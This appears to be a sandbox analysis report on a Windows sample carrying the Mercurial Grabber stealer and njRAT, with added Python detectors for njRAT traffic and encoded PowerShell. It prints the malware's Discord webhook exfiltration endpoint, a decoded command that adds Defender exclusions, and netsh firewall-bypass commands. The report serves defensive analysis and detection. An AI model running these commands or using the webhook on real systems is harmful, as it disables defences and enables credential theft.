Analysis

max time kernel: 150s
max time network: 182s
platform: windows7_x64
resource: win7-20220812-en
resource tags: arch:x64, arch:x86, image:win7-20220812-en, locale:en-us, os:windows7-x64, system
submitted: 03-10-2022 23:20

Static task: static1
Behavioral task: behavioral1
Sample: 4e6984054c17293752f8d11ccac45e70.exe
Resource: win7-20220812-en
General

Target: 4e6984054c17293752f8d11ccac45e70.exe
Size: 159KB
MD5: 4e6984054c17293752f8d11ccac45e70
SHA1: 96b45cc928488f23eb485ebd72f1276996c7f785
SHA256: 8d38d3866a011792617c9784fc9dc556f0c8c6aeeeb96aef679aea6ff6831028
SHA512: 978e885d724fd91553483a077979f940a9349e45fce08b4a39c5cac25a5a75e0dd27b166b4724be19a435beef780ad8f866787035944285222385623af1ce9a5
SSDEEP: 3072:C6x5F6chV9MBOefbGEKr2fewpgsRMCo1pn2A3PM+:CK6u9p3EKbwhRMCkp
Malware Config

Extracted: mercurialgrabber
C2 (Discord webhook): https://discord.com/api/webhooks/1020039781461270569/vy0h8kS-gC86OffrPKkierhCOJQYdMCGfu4Dr7HRyL4VcCHEP6llcvNaOkPDg-SgwAnl

Extracted: njrat
version: 0.7d
botnet: HacKed
C2: Ni50Y3AuZXUubmdyb2suaW8Strik:MTM5OTI= (shown exactly as the extractor emitted it)
mutex: dcc8f8f212bdcee4931d8d1d2c481753
reg_key: dcc8f8f212bdcee4931d8d1d2c481753
splitter: |'|'|
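The splitter, botnet id and version above are what a network detection needs to recognise this client on the wire. The following is an added example written for this page, not code from the sandbox or from njRAT: it frames and parses njRAT-style traffic (ASCII decimal length, a NUL byte, then splitter-joined fields) and applies a beacon heuristic. Only the splitter, botnet id and version come from the page; the length-prefix framing is njRAT's known wire format, and the field layout after the command word, the sample hostname, user and volume serial are constructed assumptions for illustration. The C2 string is left undecoded.

```python
import base64
import binascii

# Values taken from the extracted njRAT configuration above.
SPLITTER = b"|'|'|"
BOTNET = b"HacKed"
VERSION = b"0.7d"


def build_frame(fields, splitter=SPLITTER):
    """njRAT framing: ASCII decimal payload length, a NUL byte, then the splitter-joined fields."""
    payload = splitter.join(fields)
    return str(len(payload)).encode("ascii") + b"\x00" + payload


def parse_frames(stream, splitter=SPLITTER):
    """Split a reassembled TCP stream into complete frames; return (frames, unconsumed tail)."""
    frames, pos = [], 0
    while pos < len(stream):
        nul = stream.find(b"\x00", pos)
        if nul < 0 or not stream[pos:nul].isdigit():
            break                                   # not njRAT framing at this offset
        start, end = nul + 1, nul + 1 + int(stream[pos:nul])
        if end > len(stream):
            break                                   # partial frame: keep for the next segment
        frames.append(stream[start:end].split(splitter))
        pos = end
    return frames, stream[pos:]


def is_njrat_beacon(fields, botnet=BOTNET, version=VERSION):
    """Heuristic on one parsed frame. ASSUMED layout: a short command word, then a base64
    victim id of the form '<botnet>_<volume serial>', with the client version somewhere later."""
    if len(fields) < 3 or not (1 <= len(fields[0]) <= 4 and fields[0].isalpha()):
        return False
    try:
        victim = base64.b64decode(fields[1], validate=True)
    except (binascii.Error, ValueError):
        return False
    return victim.startswith(botnet + b"_") and version in fields


# Constructed sample stream (not captured traffic): a victim-info frame, a short second
# frame, and a truncated third frame to exercise reassembly across TCP segments.
SAMPLE_STREAM = (
    build_frame([b"ll", base64.b64encode(b"HacKed_5A1B2C3D"), b"WIN7-PC", b"Admin",
                 b"22-10-03", b"", b"Win 7 Ultimate SP1", b"No", VERSION, b"..", b""])
    + build_frame([b"inf"])
    + b"12\x00ll|'|"
)


def scan_stream(stream):
    """Return (number of frames that look like njRAT beacons, leftover bytes to carry over)."""
    frames, tail = parse_frames(stream)
    return sum(1 for f in frames if is_njrat_beacon(f)), tail


if __name__ == "__main__":
    hits, tail = scan_stream(SAMPLE_STREAM)
    print(f"njRAT-looking frames: {hits}, unconsumed bytes: {tail!r}")
```

The length prefix is what makes this robust in a stream parser: a frame whose declared length overruns the buffer is held back rather than mis-split, and anything that is not digits-then-NUL at the current offset ends parsing instead of producing garbage fields.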
Signatures

Mercurial Grabber Stealer
Mercurial Grabber is an open source stealer targeting Chrome, Discord and some game clients as well as generic system information.

Looks for VirtualBox Guest Additions in registry (2 TTPs, 1 IoC)
  output.exe: Key opened \REGISTRY\MACHINE\SOFTWARE\Oracle\VirtualBox Guest Additions

Executes dropped EXE (2 IoCs)
  PID 1568 output.exe
  PID 884 Windows Defender.exe

Looks for VMWare Tools registry key (2 TTPs, 1 IoC)
  output.exe: Key opened \REGISTRY\MACHINE\SOFTWARE\VMWare, Inc.\VMWare Tools

Modifies Windows Firewall (1 TTP, 3 IoCs)
  PID 824 netsh.exe
  PID 1752 netsh.exe
  PID 1464 netsh.exe

Checks BIOS information in registry (2 TTPs, 1 IoC)
BIOS information is often read in order to detect sandboxing environments.
  output.exe: Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion

Drops startup file (2 IoCs)
  Windows Defender.exe: File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Corporation.exe
  Windows Defender.exe: File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Corporation.exe

Loads dropped DLL (3 IoCs)
  PID 1004 4e6984054c17293752f8d11ccac45e70.exe (reported three times)

Reads user/profile data of web browsers (2 TTPs)
Infostealers often target stored browser data, which can include saved credentials etc.

Legitimate hosting services abused for malware hosting/C2 (1 TTP)

Looks up external IP address via web service (4 IoCs)
Uses a legitimate IP lookup service to find the infected system's external IP.
  flow 6: ip4.seeip.org
  flow 7: ip4.seeip.org
  flow 15: ip4.seeip.org
  flow 16: ip-api.com

Maps connected drives based on registry (3 TTPs, 2 IoCs)
Disk information is often read in order to detect sandboxing environments.
  output.exe: Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum
  output.exe: Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum\0

Enumerates physical storage devices (1 TTP)
Attempts to interact with connected storage/optical drive(s). The sandbox's generic text for this signature calls it likely ransomware behaviour; nothing else in this report (no mass file modification, no encryption artifacts) supports that reading here, and the drive enumeration fits the system-profiling and sandbox-detection checks recorded for output.exe.
Program crash (1 IoC)
  PID 1516 WerFault.exe, target PID 1568 output.exe

Checks SCSI registry key(s) (3 TTPs, 1 IoC)
SCSI information is often read in order to detect sandboxing environments.
  output.exe: Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_VMware_&Prod_VMware_Virtual_S

Checks processor information in registry (2 TTPs, 2 IoCs)
Processor information is often read in order to detect sandboxing environments.
  output.exe: Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0
  output.exe: Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString

Delays execution with timeout.exe (5 IoCs)
  PID 432 timeout.exe
  PID 336 timeout.exe
  PID 1076 timeout.exe
  PID 1668 timeout.exe
  PID 1820 timeout.exe

Enumerates system info in registry (2 TTPs, 4 IoCs)
  output.exe: Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosInformation
  output.exe: Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemManufacturer
  output.exe: Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemProductName
  output.exe: Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Logical Unit Id 0
Modifies system certificate store
  output.exe: Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13
  output.exe: Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob (blob data not shown on this page; written three times)
  output.exe: Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8
  output.exe: Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob (blob data not shown on this page)
Both thumbprints belong to public CA roots: DAC9024F54D8F6DF94935FB1732638CA6AD77C13 is DST Root CA X3 and CABD2A79A1076A31F21D253635CB039D4329A5E8 is ISRG Root X1, the Let's Encrypt chain. Well-known roots landing in AuthRoot on a fresh image are consistent with Windows' on-demand root update during an outbound TLS connection rather than with a rogue root being installed, but confirm that against the stored blob before discounting the signature.
Suspicious behavior: EnumeratesProcesses (1 IoC)
  PID 1632 powershell.exe

Suspicious behavior: GetForegroundWindowSpam (1 IoC)
  PID 884 Windows Defender.exe

Suspicious use of AdjustPrivilegeToken (21 IoCs)
  Token: SeDebugPrivilege, PID 1632 powershell.exe
  Token: SeDebugPrivilege, PID 1568 output.exe
  Token: SeDebugPrivilege, PID 884 Windows Defender.exe
  Token: 33 followed by Token: SeIncBasePriorityPrivilege, PID 884 Windows Defender.exe (the pair repeats nine times)

Suspicious use of WriteProcessMemory (63 IoCs; identical source/target entries collapsed with a repeat count, in the order reported)
  PID 1004 4e6984054c17293752f8d11ccac45e70.exe wrote to PID 1632 powershell.exe (x4)
  PID 1004 4e6984054c17293752f8d11ccac45e70.exe wrote to PID 1568 output.exe (x4)
  PID 1004 4e6984054c17293752f8d11ccac45e70.exe wrote to PID 884 Windows Defender.exe (x4)
  PID 1004 4e6984054c17293752f8d11ccac45e70.exe wrote to PID 920 cmd.exe (x4)
  PID 920 cmd.exe wrote to PID 684 chcp.com (x4)
  PID 920 cmd.exe wrote to PID 1540 mode.com (x4)
  PID 920 cmd.exe wrote to PID 432 timeout.exe (x4)
  PID 920 cmd.exe wrote to PID 336 timeout.exe (x4)
  PID 884 Windows Defender.exe wrote to PID 824 netsh.exe (x4)
  PID 884 Windows Defender.exe wrote to PID 1752 netsh.exe (x4)
  PID 884 Windows Defender.exe wrote to PID 1464 netsh.exe (x4)
  PID 920 cmd.exe wrote to PID 1076 timeout.exe (x4)
  PID 920 cmd.exe wrote to PID 1668 timeout.exe (x4)
  PID 920 cmd.exe wrote to PID 1820 timeout.exe (x4)
  PID 920 cmd.exe wrote to PID 1748 mode.com (x4)
  PID 1568 output.exe wrote to PID 1516 WerFault.exe (x3)
The uniform four writes per child are the parent-to-child writes that accompany ordinary process creation, not injection into a running process; this list is best read as the spawn order.
Processes

C:\Users\Admin\AppData\Local\Temp\4e6984054c17293752f8d11ccac45e70.exe
  "C:\Users\Admin\AppData\Local\Temp\4e6984054c17293752f8d11ccac45e70.exe"
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory

  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGMAbAB6ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAdQBnACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHgAaQB6ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGwAbABjACMAPgA="
    The -EncodedCommand argument is base64 over UTF-16LE text and decodes to:
      <#clz#>Add-MpPreference <#eug#> -ExclusionPath @($env:UserProfile,$env:SystemDrive) <#xiz#> -Force <#llc#>
    That adds the whole user profile and the whole system drive to the Windows Defender exclusion list; the <#...#> block comments are inert padding that defeats naive string matching on the decoded text. This child is spawned first, before output.exe and Windows Defender.exe are written and run from the same Temp directory.
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken

  C:\Users\Admin\AppData\Local\Temp\output.exe
    "C:\Users\Admin\AppData\Local\Temp\output.exe"
    - Looks for VirtualBox Guest Additions in registry
    - Executes dropped EXE
    - Looks for VMWare Tools registry key
    - Checks BIOS information in registry
    - Maps connected drives based on registry
    - Checks SCSI registry key(s)
    - Checks processor information in registry
    - Enumerates system info in registry
    - Modifies system certificate store
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory

    C:\Windows\system32\WerFault.exe
      C:\Windows\system32\WerFault.exe -u -p 1568 -s 1856
      - Program crash

  C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe
    "C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe"
    - Executes dropped EXE
    - Drops startup file
    - Suspicious behavior: GetForegroundWindowSpam
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory

    C:\Windows\SysWOW64\netsh.exe
      netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe" "Windows Defender.exe" ENABLE
      - Modifies Windows Firewall

    C:\Windows\SysWOW64\netsh.exe
      netsh firewall delete allowedprogram "C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe"
      - Modifies Windows Firewall

    C:\Windows\SysWOW64\netsh.exe
      netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe" "Windows Defender.exe" ENABLE
      - Modifies Windows Firewall

    The exception is keyed to the dropped file's path and goes through the legacy "netsh firewall" context, which Windows 7 still honours; the add, delete, add sequence leaves one allow rule for the binary in place.

  C:\Windows\SysWOW64\cmd.exe
    cmd /c ""C:\Users\Admin\AppData\Local\Temp\scam_woofer.bat" "
    - Suspicious use of WriteProcessMemory

    C:\Windows\SysWOW64\chcp.com
      chcp 65001

    C:\Windows\SysWOW64\mode.com
      mode 80,15

    C:\Windows\SysWOW64\timeout.exe
      timeout 3
      - Delays execution with timeout.exe

    C:\Windows\SysWOW64\timeout.exe
      timeout 2
      - Delays execution with timeout.exe

    C:\Windows\SysWOW64\timeout.exe
      timeout 2
      - Delays execution with timeout.exe

    C:\Windows\SysWOW64\timeout.exe
      timeout 3
      - Delays execution with timeout.exe

    C:\Windows\SysWOW64\timeout.exe
      timeout 2
      - Delays execution with timeout.exe

    C:\Windows\SysWOW64\mode.com
      mode 130,30
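The powershell.exe node above is the one line in this tree that disarms the host, and it only becomes readable once the -EncodedCommand blob is decoded and the junk <# #> comments are removed. The following is an added example written for this page, not sandbox code: it decodes an -EncodedCommand argument (base64 over UTF-16LE), normalises the script by stripping block comments, and flags Defender-tampering cmdlets. The encoded string and the powershell.exe path are the page's; the surrounding command line, the accepted parameter abbreviations and the finding labels are this example's own assumptions.

```python
import base64
import binascii
import re

# The -EncodedCommand value copied verbatim from the powershell.exe node in the process tree above.
ENCODED = "PAAjAGMAbAB6ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAdQBnACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHgAaQB6ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGwAbABjACMAPgA="

# Constructed command line in the shape the sandbox recorded (path and argument are from the page).
SAMPLE_CMDLINE = (
    r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "' + ENCODED + '"'
)

# powershell.exe accepts unambiguous prefixes of -EncodedCommand; these are the ones seen in the wild.
ENC_ARG = re.compile(r'-(?:EncodedCommand|enc|ec|e)\s+"?([A-Za-z0-9+/=]+)', re.I)
BLOCK_COMMENT = re.compile(r"<#.*?#>", re.DOTALL)

# Post-normalisation patterns for Defender tampering (this sample hits the first one).
DEFENSE_EVASION = [
    (re.compile(r"\bAdd-MpPreference\b.*-Exclusion(?:Path|Process|Extension)", re.I), "Defender exclusion added"),
    (re.compile(r"\bSet-MpPreference\b.*-Disable\w+", re.I), "Defender feature disabled"),
]


def decode_encoded_command(b64):
    """-EncodedCommand is base64 over UTF-16LE; an odd byte count means it is not that."""
    raw = base64.b64decode(b64, validate=True)
    if len(raw) % 2:
        raise ValueError("not UTF-16LE: odd byte count")
    return raw.decode("utf-16-le")


def normalize(script):
    """Drop <# #> block comments (used here as junk padding) and collapse whitespace."""
    return " ".join(BLOCK_COMMENT.sub(" ", script).split())


def match_findings(script):
    return [label for pat, label in DEFENSE_EVASION if pat.search(script)]


def analyze_cmdline(cmdline):
    """Return whether the command was encoded, the normalised script text, and the findings."""
    m = ENC_ARG.search(cmdline)
    script, encoded = cmdline, False
    if m:
        try:
            script, encoded = decode_encoded_command(m.group(1)), True
        except (binascii.Error, ValueError, UnicodeDecodeError):
            pass                          # looked like -e <blob> but is not a decodable payload
    script = normalize(script)
    return {"encoded": encoded, "script": script, "findings": match_findings(script)}


if __name__ == "__main__":
    result = analyze_cmdline(SAMPLE_CMDLINE)
    print(result["script"])
    print("findings:", result["findings"])
```

Matching after normalisation is the point: a rule written against the raw decoded text would miss this command because the comment blocks sit between the cmdlet and its parameter, while the rule here sees "Add-MpPreference -ExclusionPath @($env:UserProfile,$env:SystemDrive) -Force".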
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads

C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe (also listed as \Users\Admin\AppData\Local\Temp\Windows Defender.exe; four entries with identical hashes collapsed)
  Filesize: 93KB
  MD5: 0c6c4a3d96c78a24d6568b83e141896e
  SHA1: f5fb76840cb984722f61b370fb6641fa4ad9ac7e
  SHA256: 73870820b2784abba4cc69c26a57743e5a4e306727c7dc2d28e5753fa5fed2d7
  SHA512: 1700a41014d50b79dd896fee0a705c700f3c534860b0ceefebc6413941520aedad7aa85f1f4c11d84c362b46de15e5ca7d9fa4a108fbaa9ca895107dee1d68be

C:\Users\Admin\AppData\Local\Temp\output.exe (also listed as \Users\Admin\AppData\Local\Temp\output.exe; three entries with identical hashes collapsed)
  Filesize: 41KB
  MD5: 5f34fc15a6555433e91d8dc0564d2092
  SHA1: dc786e4ddf9af8de8909da2489d2848dd39f762a
  SHA256: c35218e577fe12ad1aa6835840f5b762893aeaa7759ea39aef6ef6b15a954e8c
  SHA512: fb90d8cfddd514cfc196149169c64578c11433ad27d0a0efc7394eae6b7a2f458d9184b84eec730e1a1ae1c5248a6749e6f21cdad42e1387e33ba1a23766b238

C:\Users\Admin\AppData\Local\Temp\scam_woofer.bat
  Filesize: 19KB
  MD5: 4b4e566a986fe97ba2d89f9c64a24c64
  SHA1: 18bba3d5058b4b53fc99f9fba94110f4e8f8c2ea
  SHA256: 2950d0e125c3d1d11be27388ca83ef5d3fbcd71e49c0ed4eb0e0373340707a97
  SHA512: 32e39cbd0ba54cd1bcf25158774a44060d65bdeef9de0986be5267c3da229d8e743afaa67b98492172b7b59cd3fb0cf9e0c5dc149651a3518479ac8af677cee8
Memory dumps (PID-sequence-range; mapping dumps carry no size, module/region dumps do)
  memory/336-75-0x0000000000000000-mapping.dmp
  memory/432-72-0x0000000000000000-mapping.dmp
  memory/684-68-0x0000000000000000-mapping.dmp
  memory/824-77-0x0000000000000000-mapping.dmp
  memory/884-63-0x0000000000000000-mapping.dmp
  memory/884-87-0x0000000073E10000-0x00000000743BB000-memory.dmp (5.7MB)
  memory/884-73-0x0000000073E10000-0x00000000743BB000-memory.dmp (5.7MB)
  memory/920-65-0x0000000000000000-mapping.dmp
  memory/1004-54-0x0000000075211000-0x0000000075213000-memory.dmp (8KB)
  memory/1076-83-0x0000000000000000-mapping.dmp
  memory/1464-80-0x0000000000000000-mapping.dmp
  memory/1516-88-0x0000000000000000-mapping.dmp
  memory/1540-71-0x0000000000000000-mapping.dmp
  memory/1568-58-0x0000000000000000-mapping.dmp
  memory/1568-69-0x00000000001C0000-0x00000000001D0000-memory.dmp (64KB)
  memory/1632-74-0x0000000073E10000-0x00000000743BB000-memory.dmp (5.7MB)
  memory/1632-55-0x0000000000000000-mapping.dmp
  memory/1632-76-0x0000000073E10000-0x00000000743BB000-memory.dmp (5.7MB)
  memory/1668-84-0x0000000000000000-mapping.dmp
  memory/1748-86-0x0000000000000000-mapping.dmp
  memory/1752-79-0x0000000000000000-mapping.dmp
  memory/1820-85-0x0000000000000000-mapping.dmp